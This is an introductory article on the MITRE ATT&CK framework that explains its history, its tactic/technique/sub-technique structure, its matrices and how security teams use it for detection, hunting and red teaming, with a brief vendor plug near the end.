Understanding MITRE ATT&CK Fundamentals
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is the gold standard framework for understanding how cybercriminals actually operate. Rather than academic theories, ATT&CK documents real-world tactics and techniques observed in actual cyberattacks. This real-world focus makes ATT&CK invaluable for security professionals, from threat hunters to policy makers.
The name itself describes the framework's structure: Tactics are the "why"—high-level goals adversaries try to achieve. Techniques are the "how"—specific methods for accomplishing those tactics. Common Knowledge includes code, tools, and documentation adversaries use.
ATT&CK was created by MITRE Corporation, a non-profit research organization, and is maintained with input from security researchers, security vendors, government agencies, and the broader cybersecurity community. Its collaborative development and public availability have made it the industry-standard threat model.
The framework is free and publicly available, making it accessible to organizations of all sizes. This democratization of threat intelligence has transformed how security teams approach defensive operations.
The History and Development of ATT&CK
MITRE ATT&CK emerged from MITRE's work defending United States government networks. Security teams needed a structured way to understand and discuss adversary behavior. Rather than creating theoretical models, they documented what they observed in actual intrusions.
The first version of ATT&CK focused on enterprise networks. Its success led to expansion into other domains: cloud environments, mobile devices, and industrial control systems. Today, ATT&CK spans multiple matrices each documenting adversary behavior in specific environments.
The framework started with knowledge distilled from intrusion data, research papers, and security vendor publications. Over time, the community has contributed data from real intrusions, transforming ATT&CK into a continuously updated knowledge base.
MITRE regularly updates ATT&CK with new techniques, tactics, and sub-techniques as adversaries evolve their methods. These updates are collaborative—security organizations worldwide contribute observations of new adversary behaviors.
The Structure of ATT&CK
ATT&CK is organized hierarchically: Tactics at the top level, Techniques beneath them, and Sub-techniques providing additional granularity. This structure enables both high-level strategic understanding and detailed tactical knowledge.
Tactics represent the adversary's objectives or goals. Why is the attacker doing something? The Enterprise ATT&CK matrix includes 14 tactics:
| ID | Tactic | What It Answers |
|---|---|---|
| TA0043 | Reconnaissance | What does the adversary learn about the target before attacking? |
| TA0042 | Resource Development | What resources does the adversary build or acquire before the attack? |
| TA0001 | Initial Access | How does the adversary establish a foothold? |
| TA0002 | Execution | How does the adversary run malicious code? |
| TA0003 | Persistence | How does the adversary maintain access across restarts? |
| TA0004 | Privilege Escalation | How does the adversary gain higher-level permissions? |
| TA0005 | Defense Evasion | How does the adversary avoid detection? |
| TA0006 | Credential Access | How does the adversary steal credentials? |
| TA0007 | Discovery | What does the adversary learn about the environment? |
| TA0008 | Lateral Movement | How does the adversary move through the network? |
| TA0009 | Collection | What data does the adversary gather? |
| TA0011 | Command and Control | How does the adversary communicate with compromised systems? |
| TA0010 | Exfiltration | How does the adversary steal data from the network? |
| TA0040 | Impact | What damage does the adversary cause? |
For a detailed breakdown of each tactic with examples, see our guide on ATT&CK tactics vs. techniques.
Each tactic contains multiple techniques—specific methods for achieving that goal. For example, under "Initial Access," techniques include Phishing, Exploit Public-Facing Application, and Supply Chain Compromise. The Enterprise matrix contains over 200 techniques and nearly 500 sub-techniques.
Sub-techniques provide even greater specificity. For example, the Phishing technique includes sub-techniques like Phishing: Spearphishing Attachment (T1566.001), Phishing: Spearphishing Link (T1566.002), and Phishing: Spearphishing via Service (T1566.003). This three-level hierarchy—tactic → technique → sub-technique—balances strategic overview with operational detail.
Adversary Groups in ATT&CK
ATT&CK documents known adversary groups and their characteristic behaviors. Rather than using arbitrary names, MITRE references groups by identifiers (G-numbers) and also includes common aliases.
For each group, ATT&CK documents which tactics and techniques that group typically uses. This enables researchers to correlate observed activity with known groups. If you detect techniques commonly used by a known group, it suggests that group might be responsible for the attack.
This knowledge is invaluable for incident response, threat hunting, and defensive prioritization. Understanding which groups target your industry helps focus security investments on the most relevant threats.
Software and Tools in ATT&CK
ATT&CK documents tools used by adversaries in attacks. These include both malware and legitimate tools repurposed for attacks (living-off-the-land techniques).
Each tool is mapped to techniques it implements. This helps defenders understand what capabilities attackers might gain if they use specific malware or tools. If you detect a tool on your network, ATT&CK tells you what techniques and capabilities that tool provides.
This documentation helps security teams understand attack toolkits comprehensively. Rather than just knowing malware X exists, you know what X is designed to do and what techniques it implements.
The Practical Value of ATT&CK
ATT&CK provides a common language for security discussions. Rather than vague descriptions, teams can reference specific technique identifiers (T-numbers). "We detected T1083 (File and Directory Discovery)" is precise and understood globally.
For defensive prioritization, ATT&CK helps identify which techniques matter most for your organization. If certain techniques are commonly used against your industry and you haven't defended against them, that's a gap worth addressing.
ATT&CK enables objective assessment of your defensive capabilities. You can map your detection and prevention capabilities to specific ATT&CK techniques, identifying coverage gaps.
For threat hunting, ATT&CK provides a systematic framework. Rather than randomly searching for indicators of compromise, you can systematically hunt for each technique an adversary might use.
For incident response, ATT&CK helps understand adversary objectives and next steps. Recognizing tactics helps predict what an attacker might do next.
ATT&CK Matrices
MITRE maintains multiple matrices tailored to different environments:
Enterprise: The primary matrix covering Windows, Linux, macOS, and cloud platforms (AWS, Azure, GCP, SaaS, etc.). Since ATT&CK v9 (2021), cloud techniques are part of the Enterprise matrix as platform-specific filters rather than a separate matrix.
Mobile: Covers iOS and Android, documenting mobile-specific attack methods.
ICS (Industrial Control Systems): Covers tactics and techniques specific to attacking industrial control systems and critical infrastructure.
Each matrix has the same tactic/technique/sub-technique structure but documents environment-specific adversary behaviors.
How Organizations Use ATT&CK
ATT&CK supports four primary use cases, each building on the framework's structured approach to adversary behavior:
Detection Engineering and Coverage Assessment: Security teams map their detection rules to ATT&CK techniques to identify which attacks they can detect and where gaps exist. By visualizing coverage with the ATT&CK Navigator, teams can objectively assess their defensive posture and prioritize investments in the areas that matter most.
Threat Hunting: Rather than waiting for alerts, threat hunters proactively search for adversary activity using ATT&CK as a systematic guide. Hunting for specific techniques (like OS Credential Dumping or PowerShell execution) is more effective than random indicator searches because techniques remain stable even as attackers change their tools and infrastructure.
Red Teaming and Adversary Emulation: Red teams use ATT&CK to design realistic exercises that simulate documented adversary behavior. Rather than arbitrary attacks, ATT&CK-based exercises test defenses against techniques actually used by threat groups targeting your industry.
Vendor Evaluation: ATT&CK provides an objective basis for comparing security products. MITRE Engenuity ATT&CK Evaluations independently test vendor platforms against standardized attack sequences, measuring detection coverage, protection capability, and false positive rates. These evaluations are the closest thing to standardized testing for security vendors — platforms like CrowdStrike Falcon consistently perform well in these evaluations. See our MDR vendor performance benchmarks for a comparison of evaluation results across leading providers. Organizations that lack in-house expertise to act on ATT&CK-based assessments can benefit from a 24/7 detection and response service that maps alerts to ATT&CK techniques around the clock.
Common Misconceptions About ATT&CK
ATT&CK isn't a prioritized list. It's not ordered by importance or frequency. Every technique in ATT&CK has been observed in real attacks, but frequencies vary.
ATT&CK isn't a framework for building security solutions. It documents adversary behavior, not how to defend. Defense frameworks like NIST or CIS Controls map to ATT&CK but aren't part of it.
ATT&CK isn't just for large enterprises. Organizations of all sizes benefit from understanding these techniques. Even if sophisticated APTs aren't your primary concern, techniques in ATT&CK are used by various threat actors at all sophistication levels.
ATT&CK isn't static. It evolves constantly as new attack methods are discovered and documented. Staying current with ATT&CK updates is important.
Using ATT&CK in Your Organization
Start by reviewing the techniques relevant to your industry and organization type. What techniques do attackers commonly use against companies like yours?
Map your detections to ATT&CK techniques. Which techniques can you detect? Which can you prevent? Where are the gaps?
Use ATT&CK for threat hunting. Select a technique, search your logs and systems for indicators of that technique, and remediate if found.
Incorporate ATT&CK into incident response. When you detect activity, map it to ATT&CK techniques to understand the attack, predict next steps, and inform response actions.
Train your security team using ATT&CK. Ensure everyone understands the framework and can reference it in discussions and documentation.
ATT&CK Tools and Resources
MITRE provides the ATT&CK Navigator, a visualization tool for exploring the framework. Color-code techniques you can detect, techniques you're vulnerable to, or techniques used by specific adversaries.
Security vendors integrate ATT&CK into their platforms, enabling automated technique mapping of detections.
Open-source tools and scripts help analyze logs and correlate findings to ATT&CK techniques.
Dozens of training courses teach ATT&CK and how to apply it.
Getting Started with ATT&CK
If you're new to ATT&CK, start with these resources in order:
- Understand tactics vs. techniques — Learn the fundamental hierarchy that organizes ATT&CK
- Explore sub-techniques — Understand the granular detail that makes ATT&CK actionable for detection engineering
- Use the ATT&CK Navigator — Visualize the framework and create coverage maps
- Understand data sources — Learn what telemetry you need to detect specific techniques
- Map your detections — Systematically assess your defensive coverage
- Start threat hunting — Proactively search for adversary activity using ATT&CK as your guide
- Plan red team exercises — Test your defenses against realistic adversary behavior
Conclusion
MITRE ATT&CK is the industry-standard framework for understanding how adversaries actually attack. It documents real-world tactics and techniques observed in actual cyberattacks, providing actionable intelligence for defensive operations. Understanding ATT&CK enables security teams to speak a common language, prioritize defenses effectively, and conduct systematic threat hunting. Whether you're responding to incidents, evaluating security vendors, or planning defensive improvements, ATT&CK provides the framework for understanding and defending against real-world threats.